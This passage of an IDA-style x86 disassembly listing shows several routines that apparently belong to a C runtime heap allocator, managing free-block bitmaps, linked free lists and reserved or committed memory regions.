mov ecx, [ebp+var_10]
mov edx, [eax+4]
cmp edx, [ecx+8]
jnz loc_41D54A
cmp [ebp+var_20], 20h
jge short loc_41D4DF
mov eax, 80000000h
mov ecx, [ebp+var_20]
shr eax, cl
not eax
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov ecx, [edx+ecx*4+44h]
and ecx, eax
mov edx, [ebp+var_30]
mov eax, [ebp+var_38]
mov [eax+edx*4+44h], ecx
mov ecx, [ebp+var_38]
add ecx, [ebp+var_20]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_38]
add eax, [ebp+var_20]
mov [eax+4], dl
mov ecx, [ebp+var_38]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_41D4DD
mov eax, 80000000h
mov ecx, [ebp+var_20]
shr eax, cl
not eax
mov ecx, [ebp+var_18]
mov edx, [ecx]
and edx, eax
mov eax, [ebp+var_18]
mov [eax], edx
loc_41D4DD: ; CODE XREF: sub_41D1D0+2F3�j
jmp short loc_41D54A
; ---------------------------------------------------------------------------
loc_41D4DF: ; CODE XREF: sub_41D1D0+2AE�j
mov ecx, [ebp+var_20]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
not edx
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov eax, [ecx+eax*4+0C4h]
and eax, edx
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov [edx+ecx*4+0C4h], eax
mov eax, [ebp+var_38]
add eax, [ebp+var_20]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_38]
add edx, [ebp+var_20]
mov [edx+4], cl
mov eax, [ebp+var_38]
add eax, [ebp+var_20]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_41D54A
mov ecx, [ebp+var_20]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
not edx
mov eax, [ebp+var_18]
mov ecx, [eax+4]
and ecx, edx
mov edx, [ebp+var_18]
mov [edx+4], ecx
loc_41D54A: ; CODE XREF: sub_41D1D0+2A4�j
; sub_41D1D0:loc_41D4DD�j ...
mov eax, [ebp+var_10]
mov ecx, [eax+8]
mov edx, [ebp+var_10]
mov eax, [edx+4]
mov [ecx+4], eax
mov ecx, [ebp+var_10]
mov edx, [ecx+4]
mov eax, [ebp+var_10]
mov ecx, [eax+8]
mov [edx+8], ecx
cmp [ebp+var_8], 0
jz loc_41D680
mov edx, [ebp+var_14]
mov eax, [ebp+var_4]
lea ecx, [eax+edx*8]
mov [ebp+var_C], ecx
mov edx, [ebp+var_10]
mov eax, [ebp+var_C]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_10]
mov eax, [ebp+var_C]
mov [edx+8], eax
mov ecx, [ebp+var_C]
mov edx, [ebp+var_10]
mov [ecx+4], edx
mov eax, [ebp+var_10]
mov ecx, [eax+4]
mov edx, [ebp+var_10]
mov [ecx+8], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_10]
mov edx, [eax+4]
cmp edx, [ecx+8]
jnz loc_41D680
cmp [ebp+var_14], 20h
jge short loc_41D61A
mov eax, [ebp+var_38]
add eax, [ebp+var_14]
movsx ecx, byte ptr [eax+4]
mov edx, [ebp+var_38]
add edx, [ebp+var_14]
mov al, [edx+4]
add al, 1
mov edx, [ebp+var_38]
add edx, [ebp+var_14]
mov [edx+4], al
test ecx, ecx
jnz short loc_41D5F8
mov eax, 80000000h
mov ecx, [ebp+var_14]
shr eax, cl
mov ecx, [ebp+var_18]
mov edx, [ecx]
or edx, eax
mov eax, [ebp+var_18]
mov [eax], edx
loc_41D5F8: ; CODE XREF: sub_41D1D0+410�j
mov edx, 80000000h
mov ecx, [ebp+var_14]
shr edx, cl
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov eax, [ecx+eax*4+44h]
or eax, edx
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov [edx+ecx*4+44h], eax
jmp short loc_41D680
; ---------------------------------------------------------------------------
loc_41D61A: ; CODE XREF: sub_41D1D0+3EE�j
mov eax, [ebp+var_38]
add eax, [ebp+var_14]
movsx ecx, byte ptr [eax+4]
mov edx, [ebp+var_38]
add edx, [ebp+var_14]
mov al, [edx+4]
add al, 1
mov edx, [ebp+var_38]
add edx, [ebp+var_14]
mov [edx+4], al
test ecx, ecx
jnz short loc_41D657
mov ecx, [ebp+var_14]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+var_18]
mov edx, [ecx+4]
or edx, eax
mov eax, [ebp+var_18]
mov [eax+4], edx
loc_41D657: ; CODE XREF: sub_41D1D0+46A�j
mov ecx, [ebp+var_14]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov eax, [ecx+eax*4+0C4h]
or eax, edx
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov [edx+ecx*4+0C4h], eax
loc_41D680: ; CODE XREF: sub_41D1D0+292�j
; sub_41D1D0+39C�j ...
cmp [ebp+var_8], 0
jz short loc_41D69A
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov edx, [ebp+var_10]
add edx, [ebp+var_8]
mov eax, [ebp+var_8]
mov [edx-4], eax
loc_41D69A: ; CODE XREF: sub_41D1D0+4B4�j
mov ecx, [ebp+var_10]
add ecx, [ebp+var_8]
mov [ebp+var_10], ecx
mov edx, [ebp+var_28]
add edx, 1
mov eax, [ebp+var_10]
mov [eax], edx
mov ecx, [ebp+var_28]
add ecx, 1
mov edx, [ebp+var_10]
add edx, [ebp+var_28]
mov [edx-4], ecx
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, 1
mov edx, [ebp+var_4]
mov [edx], eax
test ecx, ecx
jnz short loc_41D6F3
mov eax, [ebp+var_18]
cmp eax, dword_493770
jnz short loc_41D6F3
mov ecx, [ebp+var_30]
cmp ecx, dword_493768
jnz short loc_41D6F3
mov dword_493770, 0
loc_41D6F3: ; CODE XREF: sub_41D1D0+501�j
; sub_41D1D0+50C�j ...
mov edx, [ebp+var_38]
mov eax, [ebp+var_30]
mov [edx], eax
mov eax, [ebp+var_10]
add eax, 4
loc_41D701: ; CODE XREF: sub_41D1D0+152�j
; sub_41D1D0+178�j
pop esi
mov esp, ebp
pop ebp
retn
sub_41D1D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D710 proc near ; CODE XREF: sub_41D1D0+142�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, dword_493774
cmp eax, dword_493764
jnz short loc_41D76B
mov ecx, dword_493764
add ecx, 10h
imul ecx, 14h
push ecx
mov edx, dword_493778
push edx
push 0
mov eax, dword_49377C
push eax
call ds:dword_494444
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41D753
xor eax, eax
jmp loc_41D81B
; ---------------------------------------------------------------------------
loc_41D753: ; CODE XREF: sub_41D710+3A�j
mov ecx, [ebp+var_4]
mov dword_493778, ecx
mov edx, dword_493764
add edx, 10h
mov dword_493764, edx
loc_41D76B: ; CODE XREF: sub_41D710+F�j
mov eax, dword_493774
imul eax, 14h
mov ecx, dword_493778
add ecx, eax
mov [ebp+var_4], ecx
push 41C4h
push 8
mov edx, dword_49377C
push edx
call ds:dword_494354
mov ecx, [ebp+var_4]
mov [ecx+10h], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+10h], 0
jnz short loc_41D7A5
xor eax, eax
jmp short loc_41D81B
; ---------------------------------------------------------------------------
loc_41D7A5: ; CODE XREF: sub_41D710+8F�j
push 4
push 2000h
push 100000h
push 0
call ds:dword_494454
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+0Ch], 0
jnz short loc_41D7E2
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
push 0
mov edx, dword_49377C
push edx
call ds:dword_494350
xor eax, eax
jmp short loc_41D81B
; ---------------------------------------------------------------------------
loc_41D7E2: ; CODE XREF: sub_41D710+B6�j
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0
mov edx, [ebp+var_4]
mov dword ptr [edx+8], 0FFFFFFFFh
mov eax, dword_493774
add eax, 1
mov dword_493774, eax
mov ecx, [ebp+var_4]
mov edx, [ecx+10h]
mov dword ptr [edx], 0FFFFFFFFh
mov eax, [ebp+var_4]
loc_41D81B: ; CODE XREF: sub_41D710+3E�j
; sub_41D710+93�j ...
mov esp, ebp
pop ebp
retn
sub_41D710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D820 proc near ; CODE XREF: sub_41D1D0+15B�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
mov [ebp+var_2C], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov [ebp+var_8], eax
mov [ebp+var_28], 0
loc_41D83F: ; CODE XREF: sub_41D820+36�j
cmp [ebp+var_8], 0
jl short loc_41D858
mov ecx, [ebp+var_8]
shl ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_28]
add edx, 1
mov [ebp+var_28], edx
jmp short loc_41D83F
; ---------------------------------------------------------------------------
loc_41D858: ; CODE XREF: sub_41D820+23�j
mov eax, [ebp+var_28]
imul eax, 204h
mov ecx, [ebp+var_2C]
lea edx, [ecx+eax+144h]
mov [ebp+var_C], edx
mov [ebp+var_20], 0
jmp short loc_41D880
; ---------------------------------------------------------------------------
loc_41D877: ; CODE XREF: sub_41D820+84�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
loc_41D880: ; CODE XREF: sub_41D820+55�j
cmp [ebp+var_20], 3Fh
jge short loc_41D8A6
mov ecx, [ebp+var_20]
mov edx, [ebp+var_C]
lea eax, [edx+ecx*8]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov edx, [ebp+var_18]
mov [ecx+8], edx
mov eax, [ebp+var_18]
mov ecx, [ebp+var_18]
mov [eax+4], ecx
jmp short loc_41D877
; ---------------------------------------------------------------------------
loc_41D8A6: ; CODE XREF: sub_41D820+64�j
mov edx, [ebp+var_28]
shl edx, 0Fh
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
add ecx, edx
mov [ebp+var_10], ecx
push 4
push 1000h
push 8000h
mov edx, [ebp+var_10]
push edx
call ds:dword_494454
test eax, eax
jnz short loc_41D8D9
or eax, 0FFFFFFFFh
jmp loc_41DA0A
; ---------------------------------------------------------------------------
loc_41D8D9: ; CODE XREF: sub_41D820+AF�j
mov eax, [ebp+var_10]
add eax, 7000h
mov [ebp+var_1C], eax
mov ecx, [ebp+var_10]
mov [ebp+var_4], ecx
jmp short loc_41D8F8
; ---------------------------------------------------------------------------
loc_41D8EC: ; CODE XREF: sub_41D820+13B�j
mov edx, [ebp+var_4]
add edx, 1000h
mov [ebp+var_4], edx
loc_41D8F8: ; CODE XREF: sub_41D820+CA�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
ja short loc_41D95D
mov ecx, [ebp+var_4]
mov dword ptr [ecx+8], 0FFFFFFFFh
mov edx, [ebp+var_4]
mov dword ptr [edx+0FFCh], 0FFFFFFFFh
mov eax, [ebp+var_4]
add eax, 0Ch
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov dword ptr [ecx], 0FF0h
mov edx, [ebp+var_18]
add edx, 1000h
mov eax, [ebp+var_18]
mov [eax+4], edx
mov ecx, [ebp+var_18]
sub ecx, 1000h
mov edx, [ebp+var_18]
mov [edx+8], ecx
mov eax, [ebp+var_18]
add eax, 0FECh
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov dword ptr [ecx], 0FF0h
jmp short loc_41D8EC
; ---------------------------------------------------------------------------
loc_41D95D: ; CODE XREF: sub_41D820+DE�j
mov edx, [ebp+var_C]
add edx, 1F8h
mov [ebp+var_14], edx
mov eax, [ebp+var_10]
add eax, 0Ch
mov ecx, [ebp+var_14]
mov [ecx+4], eax
mov edx, [ebp+var_14]
mov eax, [edx+4]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov edx, [ebp+var_14]
mov [ecx+8], edx
mov eax, [ebp+var_1C]
add eax, 0Ch
mov ecx, [ebp+var_14]
mov [ecx+8], eax
mov edx, [ebp+var_14]
mov eax, [edx+8]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov edx, [ebp+var_14]
mov [ecx+4], edx
mov eax, [ebp+var_28]
mov ecx, [ebp+var_2C]
mov dword ptr [ecx+eax*4+44h], 0
mov edx, [ebp+var_28]
mov eax, [ebp+var_2C]
mov dword ptr [eax+edx*4+0C4h], 1
mov ecx, [ebp+var_2C]
movsx edx, byte ptr [ecx+43h]
mov eax, [ebp+var_2C]
mov cl, [eax+43h]
add cl, 1
mov eax, [ebp+var_2C]
mov [eax+43h], cl
test edx, edx
jnz short loc_41D9ED
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
or edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_41D9ED: ; CODE XREF: sub_41D820+1BC�j
mov edx, 80000000h
mov ecx, [ebp+var_28]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+var_28]
loc_41DA0A: ; CODE XREF: sub_41D820+B4�j
mov esp, ebp
pop ebp
retn
sub_41D820 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DA10 proc near ; CODE XREF: sub_41C620+50�p
; sub_41C6D0+81�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_8]
add eax, 17h
and al, 0F0h
mov [ebp+var_1C], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+10h]
mov [ebp+var_30], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
sub ecx, [eax+0Ch]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
shr edx, 0Fh
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
imul eax, 204h
mov ecx, [ebp+var_30]
lea edx, [ecx+eax+144h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+var_14], eax
mov ecx, [ebp+var_14]
mov edx, [ecx]
sub edx, 1
mov [ebp+var_28], edx
mov eax, [ebp+var_14]
add eax, [ebp+var_28]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_2C]
mov edx, [ecx]
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jle loc_41DD36
mov ecx, [ebp+var_10]
and ecx, 1
test ecx, ecx
jnz short loc_41DA9B
mov edx, [ebp+var_28]
add edx, [ebp+var_10]
cmp [ebp+var_1C], edx
jle short loc_41DAA2
loc_41DA9B: ; CODE XREF: sub_41DA10+7E�j
xor eax, eax
jmp loc_41DFF7
; ---------------------------------------------------------------------------
loc_41DAA2: ; CODE XREF: sub_41DA10+89�j
mov eax, [ebp+var_10]
sar eax, 4
sub eax, 1
mov [ebp+var_20], eax
cmp [ebp+var_20], 3Fh
jbe short loc_41DABB
mov [ebp+var_20], 3Fh
loc_41DABB: ; CODE XREF: sub_41DA10+A2�j
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_2C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_41DB9D
cmp [ebp+var_20], 20h
jnb short loc_41DB32
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_30]
add edx, [ebp+var_20]
mov [edx+4], cl
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_41DB30
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_41DB30: ; CODE XREF: sub_41DA10+106�j
jmp short loc_41DB9D
; ---------------------------------------------------------------------------
loc_41DB32: ; CODE XREF: sub_41DA10+C1�j
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_30]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov [eax+4], dl
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_41DB9D
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_41DB9D: ; CODE XREF: sub_41DA10+B7�j
; sub_41DA10:loc_41DB30�j ...
mov ecx, [ebp+var_2C]
mov edx, [ecx+8]
mov eax, [ebp+var_2C]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_2C]
mov eax, [edx+4]
mov ecx, [ebp+var_2C]
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_28]
add eax, [ebp+var_10]
sub eax, [ebp+var_1C]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jle loc_41DD17
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1C]
mov [ebp+var_2C], ecx
mov edx, [ebp+var_10]
sar edx, 4
sub edx, 1
mov [ebp+var_20], edx
cmp [ebp+var_20], 3Fh
jbe short loc_41DBF3
mov [ebp+var_20], 3Fh
loc_41DBF3: ; CODE XREF: sub_41DA10+1DA�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax*8]
mov [ebp+var_18], edx
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_18]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_18]
mov [eax+8], ecx
mov edx, [ebp+var_18]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+var_2C]
mov edx, [ecx+4]
mov eax, [ebp+var_2C]
mov [edx+8], eax
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_2C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_41DD03
cmp [ebp+var_20], 20h
jnb short loc_41DC9C
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov [eax+4], cl
test edx, edx
jnz short loc_41DC7A
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_41DC7A: ; CODE XREF: sub_41DA10+252�j
mov eax, 80000000h
mov ecx, [ebp+var_20]
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov ecx, [edx+ecx*4+44h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_30]
mov [eax+edx*4+44h], ecx
jmp short loc_41DD03
; ---------------------------------------------------------------------------
loc_41DC9C: ; CODE XREF: sub_41DA10+22F�j
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov [eax+4], cl
test edx, edx
jnz short loc_41DCDA
mov ecx, [ebp+var_20]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx+4], ecx
loc_41DCDA: ; CODE XREF: sub_41DA10+2AD�j
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov ecx, [edx+ecx*4+0C4h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_30]
mov [eax+edx*4+0C4h], ecx
loc_41DD03: ; CODE XREF: sub_41DA10+225�j
; sub_41DA10+28A�j
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_10]
mov [ecx], edx
mov eax, [ebp+var_2C]
add eax, [ebp+var_10]
mov ecx, [ebp+var_10]
mov [eax-4], ecx
loc_41DD17: ; CODE XREF: sub_41DA10+1BB�j
mov edx, [ebp+var_1C]
add edx, 1
mov eax, [ebp+var_14]
mov [eax], edx
mov ecx, [ebp+var_1C]
add ecx, 1
mov edx, [ebp+var_14]
add edx, [ebp+var_1C]
mov [edx-4], ecx
jmp loc_41DFF2
; ---------------------------------------------------------------------------
loc_41DD36: ; CODE XREF: sub_41DA10+70�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jge loc_41DFF2
mov ecx, [ebp+var_1C]
add ecx, 1
mov edx, [ebp+var_14]
mov [edx], ecx
mov eax, [ebp+var_1C]
add eax, 1
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1C]
mov [ecx-4], eax
mov edx, [ebp+var_14]
add edx, [ebp+var_1C]
mov [ebp+var_14], edx
mov eax, [ebp+var_28]
sub eax, [ebp+var_1C]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
sar ecx, 4
sub ecx, 1
mov [ebp+var_24], ecx
cmp [ebp+var_24], 3Fh
jbe short loc_41DD87
mov [ebp+var_24], 3Fh
loc_41DD87: ; CODE XREF: sub_41DA10+36E�j
mov edx, [ebp+var_10]
and edx, 1
test edx, edx
jnz loc_41DED0
mov eax, [ebp+var_10]
sar eax, 4
sub eax, 1
mov [ebp+var_20], eax
cmp [ebp+var_20], 3Fh
jbe short loc_41DDAE
mov [ebp+var_20], 3Fh
loc_41DDAE: ; CODE XREF: sub_41DA10+395�j
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_2C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_41DE90
cmp [ebp+var_20], 20h
jnb short loc_41DE25
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_30]
add edx, [ebp+var_20]
mov [edx+4], cl
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_41DE23
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_41DE23: ; CODE XREF: sub_41DA10+3F9�j
jmp short loc_41DE90
; ---------------------------------------------------------------------------
loc_41DE25: ; CODE XREF: sub_41DA10+3B4�j
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_30]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov [eax+4], dl
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_41DE90
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_41DE90: ; CODE XREF: sub_41DA10+3AA�j
; sub_41DA10:loc_41DE23�j ...
mov ecx, [ebp+var_2C]
mov edx, [ecx+8]
mov eax, [ebp+var_2C]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_2C]
mov eax, [edx+4]
mov ecx, [ebp+var_2C]
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_28]
add eax, [ebp+var_10]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
sar ecx, 4
sub ecx, 1
mov [ebp+var_24], ecx
cmp [ebp+var_24], 3Fh
jbe short loc_41DED0
mov [ebp+var_24], 3Fh
loc_41DED0: ; CODE XREF: sub_41DA10+37F�j
; sub_41DA10+4B7�j
mov edx, [ebp+var_24]
mov eax, [ebp+var_8]
lea ecx, [eax+edx*8]
mov [ebp+var_18], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_18]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_18]
mov [edx+8], eax
mov ecx, [ebp+var_18]
mov edx, [ebp+var_14]
mov [ecx+4], edx
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov edx, [ebp+var_14]
mov [ecx+8], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+var_14]
mov edx, [eax+4]
cmp edx, [ecx+8]
jnz loc_41DFDE
cmp [ebp+var_24], 20h
jnb short loc_41DF78
mov eax, [ebp+var_30]
add eax, [ebp+var_24]
movsx ecx, byte ptr [eax+4]
mov edx, [ebp+var_30]
add edx, [ebp+var_24]
mov al, [edx+4]
add al, 1
mov edx, [ebp+var_30]
add edx, [ebp+var_24]
mov [edx+4], al
test ecx, ecx
jnz short loc_41DF56
mov eax, 80000000h
mov ecx, [ebp+var_24]
shr eax, cl
mov ecx, [ebp+arg_0]
mov edx, [ecx]
or edx, eax
mov eax, [ebp+arg_0]
mov [eax], edx
loc_41DF56: ; CODE XREF: sub_41DA10+52E�j
mov edx, 80000000h
mov ecx, [ebp+var_24]
shr edx, cl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4+44h]
or eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov [edx+ecx*4+44h], eax
jmp short loc_41DFDE
; ---------------------------------------------------------------------------
loc_41DF78: ; CODE XREF: sub_41DA10+50C�j
mov eax, [ebp+var_30]
add eax, [ebp+var_24]
movsx ecx, byte ptr [eax+4]
mov edx, [ebp+var_30]
add edx, [ebp+var_24]
mov al, [edx+4]
add al, 1
mov edx, [ebp+var_30]
add edx, [ebp+var_24]
mov [edx+4], al
test ecx, ecx
jnz short loc_41DFB5
mov ecx, [ebp+var_24]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
or edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_41DFB5: ; CODE XREF: sub_41DA10+588�j
mov ecx, [ebp+var_24]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4+0C4h]
or eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov [edx+ecx*4+0C4h], eax
loc_41DFDE: ; CODE XREF: sub_41DA10+502�j
; sub_41DA10+566�j
mov eax, [ebp+var_14]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov edx, [ebp+var_14]
add edx, [ebp+var_28]
mov eax, [ebp+var_28]
mov [edx-4], eax
loc_41DFF2: ; CODE XREF: sub_41DA10+321�j
; sub_41DA10+32C�j
mov eax, 1
loc_41DFF7: ; CODE XREF: sub_41DA10+8D�j
mov esp, ebp
pop ebp
retn
sub_41DA10 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_493770, 0
jz loc_41E12C
mov eax, dword_493768
shl eax, 0Fh
mov ecx, dword_493770
mov edx, [ecx+0Ch]
add edx, eax
mov [ebp-4], edx
push 4000h
push 8000h
mov eax, [ebp-4]
push eax
call ds:dword_494450
mov edx, 80000000h
